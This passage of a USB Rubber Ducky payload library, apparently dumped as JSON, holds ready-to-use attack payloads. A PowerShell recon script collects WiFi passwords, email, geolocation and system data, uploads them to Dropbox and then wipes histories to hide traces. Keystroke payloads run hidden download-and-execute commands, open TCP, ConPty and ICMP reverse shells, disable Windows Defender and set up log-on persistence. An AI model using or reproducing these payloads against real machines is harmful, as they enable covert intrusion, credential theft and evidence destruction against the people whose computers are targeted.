+ $_.RemotePort}}, State, AppliedSetting, OwningProcess\r\n$listener = $listener | foreach-object {\r\n $listenerItem = $_\r\n $processItem = ($process | where { [int]$_.Handle -like [int]$listenerItem.OwningProcess })\r\n new-object PSObject -property @{\r\n \"LocalAddress\" = $listenerItem.LocalAddress\r\n \"RemoteAddress\" = $listenerItem.RemoteAddress\r\n \"State\" = $listenerItem.State\r\n \"AppliedSetting\" = $listenerItem.AppliedSetting\r\n \"OwningProcess\" = $listenerItem.OwningProcess\r\n \"ProcessName\" = $processItem.ProcessName\r\n }\r\n} | select LocalAddress, RemoteAddress, State, AppliedSetting, OwningProcess, ProcessName | Sort-Object LocalAddress | Format-Table \r\n\r\n# process last\r\n$process = $process | Sort-Object ProcessName | Format-Table Handle, ProcessName, ExecutablePath, CommandLine\r\n\r\n# service\r\n$service=Get-WmiObject win32_service | select State, Name, DisplayName, PathName, @{Name=\"Sort\";Expression={$_.State + $_.Name}} | Sort-Object Sort | Format-Table State, Name, DisplayName, PathName\r\n\r\n# installed software (get uninstaller)\r\n$software=Get-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | where { $_.DisplayName -notlike $null } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize\r\n\r\n# drivers\r\n$drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion\r\n\r\n# videocard\r\n$videocard=Get-WmiObject Win32_VideoController | Format-Table Name, VideoProcessor, DriverVersion, CurrentHorizontalResolution, CurrentVerticalResolution\r\n\r\n############################################################################################################################################################\r\n\r\n# MAKE LOOT FOLDER \r\n\r\n$FileName = \"$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_computer_recon.txt\"\r\n\r\n############################################################################################################################################################\r\n\r\n# OUTPUTS RESULTS TO LOOT FILE\r\n\r\nClear-Host\r\nWrite-Host \r\n\r\necho \"Name:\" >> $env:TMP\\$FileName\r\necho \"==================================================================\" >> $env:TMP\\$FileName\r\necho $FN >> $env:TMP\\$FileName\r\necho \"\" >> $env:TMP\\$FileName\r\necho \"Email:\" >> $env:TMP\\$FileName\r\necho \"==================================================================\" >> $env:TMP\\$FileName\r\necho $EM >> $env:TMP\\$FileName\r\necho \"\" >> $env:TMP\\$FileName\r\necho \"GeoLocation:\" >> $env:TMP\\$FileName\r\necho \"==================================================================\" >> $env:TMP\\$FileName\r\necho $GL >> $env:TMP\\$FileName\r\necho \"\" >> $env:TMP\\$FileName\r\necho \"Nearby Wifi:\" >> $env:TMP\\$FileName\r\necho \"==================================================================\" >> $env:TMP\\$FileName\r\necho $NearbyWifi >> $env:TMP\\$FileName\r\necho \"\" >> $env:TMP\\$FileName\r\n$computerSystem.Name >> $env:TMP\\$FileName\r\n\"==================================================================\r\nManufacturer: \" + $computerSystem.Manufacturer >> $env:TMP\\$FileName\r\n\"Model: \" + $computerSystem.Model >> $env:TMP\\$FileName\r\n\"Serial Number: \" + $computerBIOS.SerialNumber >> $env:TMP\\$FileName\r\n\"\" >> $env:TMP\\$FileName\r\n\"\" >> $env:TMP\\$FileName\r\n\"\" >> $env:TMP\\$FileName\r\n\r\n\"OS:\r\n==================================================================\"+ ($computerOs |out-string) >> $env:TMP\\$FileName\r\n\r\n\"CPU:\r\n==================================================================\"+ ($computerCpu| out-string) >> $env:TMP\\$FileName\r\n\r\n\"RAM:\r\n==================================================================\r\nCapacity: \" + $computerRamCapacity+ ($computerRam| out-string) >> $env:TMP\\$FileName\r\n\r\n\"Mainboard:\r\n==================================================================\"+ ($computerMainboard| out-string) >> $env:TMP\\$FileName\r\n\r\n\"Bios:\r\n==================================================================\"+ (Get-WmiObject win32_bios| out-string) >> $env:TMP\\$FileName\r\n\r\n\r\n\"Local-user:\r\n==================================================================\"+ ($luser| out-string) >> $env:TMP\\$FileName\r\n\r\n\"HDDs:\r\n==================================================================\"+ ($Hdds| out-string) >> $env:TMP\\$FileName\r\n\r\n\"COM & SERIAL DEVICES:\r\n==================================================================\" + ($COMDevices | Out-String) >> $env:TMP\\$FileName\r\n\r\n\"Network: \r\n==================================================================\r\nComputers MAC address: \" + $MAC >> $env:TMP\\$FileName\r\n\"Computers IP address: \" + $computerIP.ipaddress[0] >> $env:TMP\\$FileName\r\n\"Public IP address: \" + $computerPubIP >> $env:TMP\\$FileName\r\n\"RDP: \" + $RDP >> $env:TMP\\$FileName\r\n\"\" >> $env:TMP\\$FileName\r\n($Network| out-string) >> $env:TMP\\$FileName\r\n\r\n\"W-Lan profiles: \r\n==================================================================\"+ ($WLANProfileObjects| Out-String) >> $env:TMP\\$FileName\r\n\r\n\"listeners / ActiveTcpConnections\r\n==================================================================\"+ ($listener| Out-String) >> $env:TMP\\$FileName\r\n\r\n\"Current running process: \r\n==================================================================\"+ ($process| Out-String) >> $env:TMP\\$FileName\r\n\r\n\"Services: \r\n==================================================================\"+ ($service| Out-String) >> $env:TMP\\$FileName\r\n\r\n\"Installed software:\r\n==================================================================\"+ ($software| Out-String) >> $env:TMP\\$FileName\r\n\r\n\"Installed drivers:\r\n==================================================================\"+ ($drivers| Out-String) >> $env:TMP\\$FileName\r\n\r\n\"Installed videocards:\r\n==================================================================\" + ($videocard| Out-String) >> $env:TMP\\$FileName\r\n\r\n\r\n############################################################################################################################################################\r\n\r\n# Recon all User Directories\r\n#tree $Env:userprofile /a /f | Out-File -FilePath $Env:tmp\\j-loot\\tree.txt\r\ntree $Env:userprofile /a /f >> $env:TMP\\$FileName\r\n\r\n############################################################################################################################################################\r\n\r\n# Remove Variables\r\n\r\nRemove-Variable -Name computerPubIP,\r\ncomputerIP,IsDHCPEnabled,Network,Networks, \r\ncomputerMAC,computerSystem,computerBIOS,computerOs,\r\ncomputerCpu, computerMainboard,computerRamCapacity,\r\ncomputerRam,driveType,Hdds,RDP,WLANProfileNames,WLANProfileName,\r\nOutput,WLANProfileObjects,WLANProfilePassword,WLANProfileObject,luser,\r\nprocess,listener,listenerItem,process,service,software,drivers,videocard,\r\nvault -ErrorAction SilentlyContinue -Force\r\n\r\n############################################################################################################################################################\r\n\r\n# Upload output file to dropbox\r\n\r\n$TargetFilePath=\"/$FileName\"\r\n$SourceFilePath=\"$env:TMP\\$FileName\"\r\n$arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\r\n$authorization = \"Bearer \" + $DropBoxAccessToken\r\n$headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\r\n$headers.Add(\"Authorization\", $authorization)\r\n$headers.Add(\"Dropbox-API-Arg\", $arg)\r\n$headers.Add(\"Content-Type\", 'application/octet-stream')\r\nInvoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\r\n\r\n############################################################################################################################################################\r\n\r\n<#\r\n\r\n.NOTES \r\n\tThis is to clean up behind you and remove any evidence to prove you were there\r\n#>\r\n\r\n# Delete contents of Temp folder \r\n\r\nrm $env:TEMP\\* -r -Force -ErrorAction SilentlyContinue\r\n\r\n# Delete run box history\r\n\r\nreg delete HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /va /f\r\n\r\n# Delete powershell history\r\n\r\nRemove-Item (Get-PSreadlineOption).HistorySavePath\r\n\r\n# Deletes contents of recycle bin\r\n\r\nClear-RecycleBin -Force -ErrorAction SilentlyContinue\r\n\r\n\t\t\r\n\r\n\t\r\n" }, { "path": "payloads/library/recon/Tree_of_Knowledge/-RD-ADV-Recon/README.md", "content": "![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)\n\n\n
\n Table of Contents\n
    \n
  1. Description
    2. \n
  2. Getting Started
    3. \n
  3. Contributing
    4. \n
  4. Version History
    5. \n
  5. Contact
    6. \n
  6. Acknowledgments
    7. \n
\n
\n\n# ADV-Recon\n\nA script used to do an advanced level of Recon on the targets computer\n\n## Description\n\nThis program enumerates a target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account.\nThe GeoLocation (latitude and longitude) of where the script was ran.\nThe SSID and WiFi password of any current or previously connected to networks.\nIt determines the last day they changed thier password and how many days ago.\nIntel on the system Info, HDDs, network interfaces, TCP connections, Processes, Services, Installed software, drivers, and video card \nAlong with TREE list of all files in the target computer is gathered and uploaded to your DropBox cloud storage\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10,11\n\n

(back to top)

\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl\n```\n\n

(back to top)

\n\n## Contributing\n\nAll contributors names will be listed here\n\nI am Jakoby\n\n

(back to top)

\n\n## Version History\n\n* 0.1\n * Initial Release\n\n

(back to top)

\n\n\n## Contact\n\n

I am Jakoby

\n


\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/RubberDucky/Payloads/RD-ADV-Recon)\n

\n\n\n\n

(back to top)

\n\n\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [MG](https://github.com/OMG-MG)\n\n

(back to top)

\n" }, { "path": "payloads/library/recon/Tree_of_Knowledge/-RD-ADV-Recon/payload.txt", "content": "REM Title: ADV-Recon\n\nREM Author: I am Jakoby\n\nREM Description: This payload is meant to do an advanced recon of the targets PC. See README.md file for more details.\n\nREM Target: Windows 10, 11\n\nGUI r\nDELAY 500\nSTRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl\nENTER\n\nREM Remember to replace the link with your DropBox shared link for the intended file to download\nREM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly\n" }, { "path": "payloads/library/recon/Tree_of_Knowledge/payload.txt", "content": "REM Payload created by Alex007-CyberGuy\r\nREM Check the readme.md file for more info on the payload and what is does.\r\nDEFAULTDELAY 250\r\nDELAY 3000\r\nGUI r\r\nDELAY 400\r\nSTRING cmd /k \"mode con:cols=18 lines=1&color FE&cd %userprofile%&for /f %d in ('wmic volume get driveletter^, label ^| findstr \"USB\"') do set myd=%d&echo tree /a /f > echotree.cmd\"\r\nENTER\r\nDELAY 350\r\nSTRING echotree.cmd > %myd%/%computername%.txt&del echotree.cmd&attrib +h %myd%/%computername%.txt&exit\r\nENTER\r\nALT SPACE\r\nSTRING n" }, { "path": "payloads/library/recon/Tree_of_Knowledge/readme.md", "content": "# Tree of Knowledge\r\n\r\n## Intro\r\nThis payload copies the names of all the files on a victim's PC, then puts them on a file on the root of the ducky.\r\nIn order to remove suspicion, the ducky also automatically hides the gathered recon info so that it can only be seen when the batch file is run.\r\nThis whole process is relatively discreet, bug free and can run and finish in a matter of seconds.\r\nThis payload is great for the first phase of a Pen Test, since it effortlessly shows you the contents of a victim's PC, which can then later be used for an \"involuntary backup\".\r\n\r\n## Requirements:\r\n- Only works on Windows (7/8/8.1/10)\r\n- Twin Duck firmware must be loaded\r\n- The ducky must be labeled as \"USB\"\r\n\r\n## Viewing files\r\nIn order to view the gathered recon file(s), simply put the show.bat program onto the root of the ducky and run it.\r\n\r\n## Troubleshooting\r\n1. Experiment with those delays.\r\n2. Make sure that you don't already have a recon file saved from that computer.\r\n3. ALT SPACE doesn't work on some encoders. Try using the java based encoder.\r\n\r\n### Tip\r\nThe inject.bin still works even if it is marked as \"hidden\".\r\n\r\nThat's it folks!\r\nI spent quite long in order optimise this payload, so enjoy!\r\n" }, { "path": "payloads/library/recon/Tree_of_Knowledge/show.bat", "content": "echo off:\r\nattrib *.txt -h /s /d " }, { "path": "payloads/library/recon/x-frame-options_scanner/README.md", "content": "# \"X-Frame-Options\" Scanner\n\n- Title: \"X-Frame-Options\" Scanner\n- Author: TW-D\n- Version: 1.0\n- Category: Recon\n\n## Description\n\nUses the \"Microsoft Edge\" web browser to search for web servers within \na range of IPv4 addresses that do not have an \"X-Frame-Options\" header.\n\nThen exports the results to a PDF file accessible in the Rubber Ducky.\n\nThe results contain the tested IPv4 addresses and the HTML rendering.\n\n## Tested On\n\n>\n> Microsoft Edge (Windows 10)\n>\n\n| X-Frame-Options | Encryption | Detectable |\n| --- | --- | --- |\n| None | None | Yes |\n| Set to SAMEORIGIN | None | No |\n| Set to SAMEORIGIN | Self-Signed Certificate | No |\n\n__NOTE :__ *All cases could not be tested.*\n\n## Configuration\n\nIn the \"payload.txt\" file, replace the values of the following constants :\n\n```\n\nREM ---\nREM USB Rubber Ducky label.\nREM ---\nDEFINE #RD_LABEL DUCKY\n\nREM ---\nREM Format of an allowed IPv4 address range.\nREM 192.168.0.X-192.168.0.Y where (X < Y)\nREM ---\nDEFINE #LAN 192.168.0.1-192.168.0.50\n\n```\n\n## Advanced Configuration\n\nIn the \"main.js\" file available in the \"recon_files/assets/js/\" directory, \nyou can add new ports to be tested for each host :\n\n```js\nif (LAN) {\n Promise.all(\n [\n ...,\n recon('http', 8080),\n recon('https', 8443)\n ]\n );\n}\n```\n\n## Usage\n\nAt the root of the USB Rubber Ducky, copy the \"recon_files/\" folder.\n" }, { "path": "payloads/library/recon/x-frame-options_scanner/payload.txt", "content": "REM TITLE : \"X-Frame-Options\" Scanner\nREM AUTHOR : TW-D\nREM TARGET : Microsoft Edge\nREM VERSION : 1.0\nREM CATEGORY : Recon\nREM REQUIREMENT : DuckyScript 3.0\n\nATTACKMODE HID STORAGE\nDELAY 10000\n\nREM ---\nREM USB Rubber Ducky label.\nREM ---\nDEFINE #RD_LABEL DUCKY\n\nREM ---\nREM Format of an allowed IPv4 address range.\nREM 192.168.0.X-192.168.0.Y where (X < Y)\nREM ---\nDEFINE #LAN 192.168.0.1-192.168.0.50\n\nSAVE_HOST_KEYBOARD_LOCK_STATE\n\nIF ( $_CAPSLOCK_ON ) THEN\n CAPSLOCK\n DELAY 500\nEND_IF\n\nIF ( $_NUMLOCK_ON == FALSE ) THEN\n NUMLOCK\n DELAY 500\nEND_IF\n\nGUI r\nDELAY 1500\nSTRINGLN CMD /K \"MODE CON:COLS=18 LINES=1 && FOR /F %d IN ('WMIC Volume GET DriveLetter^, Label^|FINDSTR \"#RD_LABEL\"') DO @SET RD_LABEL=%d\"\nDELAY 2000\nSTRINGLN START MSEDGE --headless --disable-gpu --run-all-compositor-stages-before-draw --print-to-pdf=\"%RD_LABEL%\\loot_%RANDOM%.pdf\" \"%RD_LABEL%\\recon_files\\index.html?lan=#LAN\" && EXIT\n\nRESTORE_HOST_KEYBOARD_LOCK_STATE\n" }, { "path": "payloads/library/recon/x-frame-options_scanner/recon_files/assets/css/style.css", "content": "body {\n margin: 0;\n}\n\nh1, #url {\n text-align: center;\n}\n\n#url {\n font-size: small;\n border-width: 1px;\n border-style: solid;\n border-color: white;\n color: whitesmoke;\n padding: 1vh 0 1vh 0;\n background-color: lightslategray;\n}\n\niframe {\n min-width: 100vw;\n max-width: 100vw;\n min-height: 98vh;\n max-height: 98vh;\n border-style: none;\n}" }, { "path": "payloads/library/recon/x-frame-options_scanner/recon_files/assets/js/constants.js", "content": "const LAN = (new URLSearchParams(document.location.search).get('lan'));\r\nconst OUTPUT = document.querySelector('#output');" }, { "path": "payloads/library/recon/x-frame-options_scanner/recon_files/assets/js/functions/recon.js", "content": "async function recon(scheme, port) {\n for (let target of targets()) {\n let url, div, iframe;\n url = (scheme + '://' + target + ':' + port + '/');\n div = document.createElement('div');\n div.id = 'url';\n div.innerText = url;\n iframe = document.createElement('iframe');\n iframe.sandbox = 'allow-same-origin allow-scripts';\n iframe.src = url;\n OUTPUT.appendChild(div);\n OUTPUT.appendChild(iframe);\n await sleep();\n }\n}" }, { "path": "payloads/library/recon/x-frame-options_scanner/recon_files/assets/js/functions/sleep.js", "content": "function sleep() {\n return(\n new Promise(\n resolve => setTimeout(resolve, 1250)\n )\n );\n}" }, { "path": "payloads/library/recon/x-frame-options_scanner/recon_files/assets/js/functions/targets.js", "content": "function targets() {\n let bounds, wholes, hosts;\n bounds = LAN.split('-');\n wholes = [bounds[0].split('.'), bounds[1].split('.')];\n hosts = [parseInt(wholes[0].pop()), parseInt(wholes[1].pop())];\n wholes = [wholes[0].join('.'), wholes[1].join('.')];\n if (wholes[0] === wholes[1]) {\n let whole, targets;\n whole = wholes[0];\n targets = new Array();\n for (let host = hosts[0]; host <= hosts[1]; host++) {\n targets.push(whole + '.' + host);\n }\n return(targets);\n } else {\n return(new Array());\n }\n}" }, { "path": "payloads/library/recon/x-frame-options_scanner/recon_files/assets/js/main.js", "content": "if (LAN) {\n Promise.all(\n [\n recon('http', 80),\n recon('https', 443)\n ]\n );\n}" }, { "path": "payloads/library/recon/x-frame-options_scanner/recon_files/index.html", "content": "\n\n \n \n \n \n \n \n
\n
\n

X-FRAME-OPTIONS Scanner

\n
\n
\n
\n \n \n \n \n \n \n" }, { "path": "payloads/library/remote_access/EnableSSH-Android/payload.txt", "content": "REM Enable SSH - Android\nREM Version 1.0\nREM OS: Android\nREM Author: KryptoKola\nREM\t Requirements: RubberDucky, Android Device with Termux Installed\nREM Description: This payload will install and run OpenSSH on Android devices with Termux installed. (Termux should be installed from F-droid for best results).\nREM\t Configuration: Place a password in the \"NewPasswordHere\" and \"ConfirmPasswordHere\" fields below.\n\nATTACKMODE HID\nDELAY 500\nGUI f\nDELAY 1000\nSTRING termux\nDELAY 500\nTAB\nDELAY 100\nTAB\nDELAY 500\nENTER\nDELAY 1500\nSTRINGLN pkg update -y;pkg install root-repo -y;pkg install openssh -y;ssh-keygen -A;sshd;passwd;\nDELAY 20000\nSTRINGLN NewPasswordHere\nDELAY 500\nSTRINGLN ConfirmPasswordHere\nDELAY 500\nALT F4\nDELAY 100\nALT F4\nDELAY 500\n" }, { "path": "payloads/library/remote_access/Hidden_access/payload.txt", "content": "REM Author: makozort \nREM Title: Hidden_access \nREM Target: windows 10 \nREM Description: gain a reverse shell to targets pc, the script works VERY qucikly agains machines with disabled defender\nREM THIS SCRIPT IS INTENDED FOR USE ON SYSTEMS YOU OWN OR HAVE BEEN GIVEN PERMISSION TO USE, I TAKE NO RESPONSIBILITIES FOR ANY MISUSE\nREM This is the rs.ps1 to host\nREM $client = New-Object System.Net.Sockets.TCPClient(\"{IP here}\",{PORT HERE});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\nDELAY 1000\nCTRL ESC\nDELAY 300\nREM this block disables windows defender, delete it if you dont need to. target may have varibles that mean you need to change how many times \"TAB\" is hit\nSTRING windows security\nDELAY 300\nENTER\nDELAY 1000\nENTER\nTAB\nTAB\nTAB\nTAB\nDELAY 300\nENTER\nDELAY 600\nSPACE\nDELAY 600\nLEFT\nENTER\nDELAY 300\nALT F4\nGUI r\nDELAY 600\nREM open up powershell in hidden mode, run the command (the rs.ps1 that needs to be edited )you have already uploaded somewhere so that the ducky does not have to type it all out\nSTRING powershell -w hidden IEX (New-Object Net.WebClient).DownloadString('LINK HERE');\nENTER\nDELAY 600\nLEFT\nENTER\n" }, { "path": "payloads/library/remote_access/NSHELL/Payload.txt.txt", "content": "REM Title: Admin Reverse shell\r\nREM Author: Naitik Dharmendra Joshi\r\nREM Description: Opens cmd and with admin privileges and starts a reverse shell in hidden Powershell window\r\nREM Target: Windows 10 (CMD, Powershell)\r\nREM Version: 1.0\r\nREM Category: General\r\n\r\nREM Change the Following Details.\r\nREM [LISTENER_IP_ADDRESS] IP Address of the Attacker System.\r\nREM [PORT] The Port on the target system you want Netcat to listen on.\r\n\r\nDELAY 300\r\nGUI r\r\nDELAY 20\r\nREM --> Opens Task Manager\r\nSTRING taskmgr\r\nDELAY 150\r\nALT f\r\nn\r\nDELAY 50\r\nREM --> Starts CMD\r\nSTRING cmd\r\nTAB\r\nREM --> Turn On Admin Privileges\r\nSPACE\r\nREM --> Run\r\nENTER\r\nDELAY 20\r\n\r\nREM --> Kills TaskManager, Executes PowerShell Commands (Hidden), Disables Windows Defender and Executes a Reverse Shell\r\nSTRING taskkill /IM taskmgr.exe && powershell -WindowStyle hidden Set-MpPreference -DisableRealtimeMonitoring $true; IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell [LISTENER_IP_ADDRESS] [PORT]\");\r\n\r\n " }, { "path": "payloads/library/remote_access/Netcat-Reverseshell-On-Log-In/payload.txt", "content": "REM Title: Netcat Reverseshell On Log In\nREM Description: Creates a powershell Job/Task to remotely connect to the computer with netcat every time user logs in\nREM Author: https://github.com/HokkaidoInu\nREM delay: You may want to change the delays and/or delete some, I have it like it is because I have really slow computer\nREM setup: \nREM Windows defender is required to be disabled\nREM Have IP and port 87 open and listening on server side for netcat reverse shell\nREM Create a txt file with the command below in it, replacing the ip to your servers ip:\nREM IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 123.456.7.890 87\nREM Host the text file online on github or your own web server or something\nREM Then in the payload, replace https://example.com/txt/load.txt with the url that you are hosting your txt file in raw format\nGUI r\nDELAY 4000\nSTRING powershell\nCTRL SHIFT ENTER\nDELAY 4000\nLEFT\nDELAY 4000\nENTER\nDELAY 4000\nSTRING $T = New-JobTrigger -AtLogOn ; $Script = Invoke-WebRequest 'https://example.com/txt/load.txt' ; $ScriptBlock = [Scriptblock]::Create($Script.Content) ; Register-ScheduledJob -Name \"Powershell\" -ScriptBlock $ScriptBlock -Trigger $T\nDELAY 4000\nENTER\nDELAY 8000\nSTRING exit\nDELAY 4000\nENTER\n" }, { "path": "payloads/library/remote_access/PingZhellDucky/PingZhellDucky.pl", "content": "#!/usr/bin/env perl\r\n#\r\n# icmpsh - simple icmp command shell\r\n# Copyright (c) 2010, Nico Leidecker \r\n# This program is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation, either version 3 of the License, or\r\n# (at your option) any later version.\r\n#\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with this program. If not, see .\r\n#\r\n# Modified by 0i41E for PingZhellDucky\r\n#\r\n# \r\n#\r\n#\r\n\r\n\r\nuse strict;\r\nuse IO::Socket;\r\nuse NetPacket::IP;\r\nuse NetPacket::ICMP qw(ICMP_ECHOREPLY ICMP_ECHO);\r\nuse Net::RawIP;\r\nuse Fcntl;\r\n\r\nprint \"Loading PingZhellDucky...\\n\";\r\n\r\n# create raw socket\r\nmy $sock = IO::Socket::INET->new(\r\n Proto => \"ICMP\",\r\n Type => SOCK_RAW,\r\n Blocking => 1) or die \"$!\";\r\n\r\n# set stdin to non-blocking\r\nfcntl(STDIN, F_SETFL, O_NONBLOCK) or die \"$!\";\r\n\r\n\r\n#Unnecessary print output - just for fun\r\nsleep(2);\r\nprint \". .\\n\";\r\nsleep(1);\r\nprint \". . .\\n\";\r\nsleep(1);\r\nprint \". . . .\";\r\nsleep(2);\r\nprint \"PingZhellDucky client ready!\\n\";\r\nmy $input = '';\r\nwhile(1) {\r\n if ($sock->recv(my $buffer, 4096, 0)) {\r\n my $ip = NetPacket::IP->decode($buffer);\r\n my $icmp = NetPacket::ICMP->decode($ip->{data});\r\n if ($icmp->{type} == ICMP_ECHO) {\r\n # get identifier and sequencenumber\r\n my ($ident,$seq,$data) = unpack(\"SSa*\", $icmp->{data});\r\n\r\n # write data to stdout and read from stdin\r\n print $data;\r\n $input = ;\r\n\r\n # compile and send response\r\n $icmp->{type} = ICMP_ECHOREPLY;\r\n $icmp->{data} = pack(\"SSa*\", $ident, $seq, $input);\r\n my $raw = $icmp->encode();\r\n my $addr = sockaddr_in(0, inet_aton($ip->{src_ip}));\r\n $sock->send($raw, 0, $addr) or die \"$!\\n\";\r\n }\r\n }\r\n}" }, { "path": "payloads/library/remote_access/PingZhellDucky/README.md", "content": "**Title: PingZhellDucky**\r\n\r\n

Author: 0i41E
\r\nOS: Windows & Unix
\r\nVersion: 1.2
\r\nRequirements: DuckyScript 3.0, perl

\r\n\r\n**What is PingZhellDucky?**\r\n#\r\n*Imagine a scenario in which communication to and from the server is protected and filtered by a firewall and does not allow TCP shell communication to take place on any listening port (both reverse and bind TCP connection).*\r\n*But many environments allow ping requests to be sent and received. Ping requests work on the ICMP protocol.*\r\n*ICMP stands for Internet Control Message Protocol; it is used by network devices’ query and error messages. ICMP differs from the widely used TCP and UDP protocols because ICMP is not used for transferring data between network devices.*\r\n*When a device wants to test connectivity to another device, it uses the PING tool (ICMP communication) to send an ECHO REQUEST and waits for an ECHO RESPONSE.*\r\n*The client ICMP agent listens for ICMP packets from a specific host and uses the data in the packet for command execution.*\r\n*The server ICMP agent (PingZhellDucky.pl) sends ICMP packets to connect to the victim running a custom ICMP agent (PingZhellDucky input) and sends it commands to execute.*\r\n#\r\nAfter PingZhellCable and PingZhellBunny, PingZhellDucky released. But what is different? PZD gives you the option to set up the infrastructre when not used on a Windows machine (perl and elevated privs required).\r\n\r\n**Instruction Version 1:**\r\n\r\nWith automatic setup:\r\nDefine INSTALL and set it to TRUE & Leave CLIENTLINK with default or choose your own\r\n![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/setupauto.png)\r\n\r\nDefine the IP of your attacking machine between the quotes at the ATTACKER section\r\n![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/ip.png)\r\n\r\nOpen up a terminal and put it into focus. Insert the Ducky into your non-Windows attack machine - wait for it to finish setup (Linux recommended - Perl required!)\r\n![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/setup.png)\r\n\r\nStart the client -> `perl PingZhellDucky.pl`\r\n![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/Client.png)\r\n\r\n

Plug your Ducky into a Windows target.
\r\nAchieve reverse shell.
\r\n run away <3

\r\n\r\n**Instruction Version 2:**\r\nWithout automatic setup:\r\nDefine INSTALL and set it to FALSE\r\n![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/install.png)\r\n\r\nUpload PingZhellDucky.pl onto your attacking machine.\r\nInstall dependencies, if needed:\r\n- IO::Socket\r\n- NetPacket::IP\r\n- NetPacket::ICMP\r\n\r\nDisable ICMP replies by the OS:\r\n `sysctl -w net.ipv4.icmp_echo_ignore_all=1`\r\n\r\nStart the client -> `perl PingZhellDucky.pl`\r\n![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/Client.png)\r\n\r\nDefine the IP of your attacking machine between the quotes at the ATTACKER section\r\n![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/ip.png)\r\n\r\n

Plug your Ducky into a Windows target.
\r\nAchieve reverse shell.
\r\n run away <3

\r\n\r\n\r\nCredit for DS 3.0 implentation and ideas:\r\n- Korben\r\n- bdamele\r\n- Nikhil Mittal\r\n- krabelize\r\n\r\n" }, { "path": "payloads/library/remote_access/PingZhellDucky/payload.txt", "content": "REM PingZhellDucky\r\nREM Version 1.2\r\nREM OS: Windows & Unix\r\nREM Author: 0i41E\r\nREM Requirements: DuckScript 3.0, Perl\r\n\r\nREM Getting remote access via ICMP or perform the required setup\r\n\r\nREM PASSIVE_WINDOWS_DETECT extension, made by Korben, to indentify the OS\r\nEXTENSION PASSIVE_WINDOWS_DETECT\r\n REM VERSION 1.0\r\n\r\n REM Windows fully passive OS Detection and passive Detect Ready\r\n REM Includes its own passive detect ready. Does not require\r\n REM additional extensions\r\n\r\n REM USAGE:\r\n REM Extension runs inline (here)\r\n REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic\r\n REM boot delay\r\n REM $_OS will be set to WINDOWS or NOT_WINDOWS\r\n\r\n REM CONFIGURATION:\r\n DEFINE MAX_WAIT 150\r\n DEFINE CHECK_INTERVAL 20\r\n DEFINE WINDOWS_HOST_REQUEST_COUNT 2\r\n DEFINE NOT_WINDOWS 7\r\n\r\n VAR $MAX_TRIES = MAX_WAIT\r\n WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))\r\n DELAY CHECK_INTERVAL\r\n $MAX_TRIES = ($MAX_TRIES - 1)\r\n END_WHILE\r\n IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN\r\n $_OS = WINDOWS\r\n ELSE\r\n $_OS = NOT_WINDOWS\r\n END_IF\r\n\r\n REM EXAMPLE USAGE AFTER EXTENSION\r\n REM IF ($_OS == WINDOWS) THEN\r\n REM STRING HELLO WINDOWS!\r\n REM ELSE\r\n REM STRING HELLO WORLD!\r\n REM 